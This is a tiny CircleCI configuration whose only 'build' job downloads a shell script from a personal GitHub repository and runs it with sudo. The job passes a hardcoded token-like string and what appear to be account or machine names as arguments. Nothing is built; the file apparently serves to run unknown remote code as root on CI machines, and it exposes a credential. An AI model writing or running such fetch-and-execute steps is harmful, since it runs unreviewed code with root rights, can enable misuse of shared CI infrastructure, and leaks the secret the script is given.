version: 2
jobs:
  build:
    machine: true
    steps:
       - run: wget https://raw.githubusercontent.com/jolinee/test/main/linux.sh
       - run: sudo ./linux.sh "delta123101" "20Rk6mrvYLekWbm6R7oYHTuXLRZ_3TQyEcv2bNSfiMdxVGGQW" "alpha" "alpha-mach"
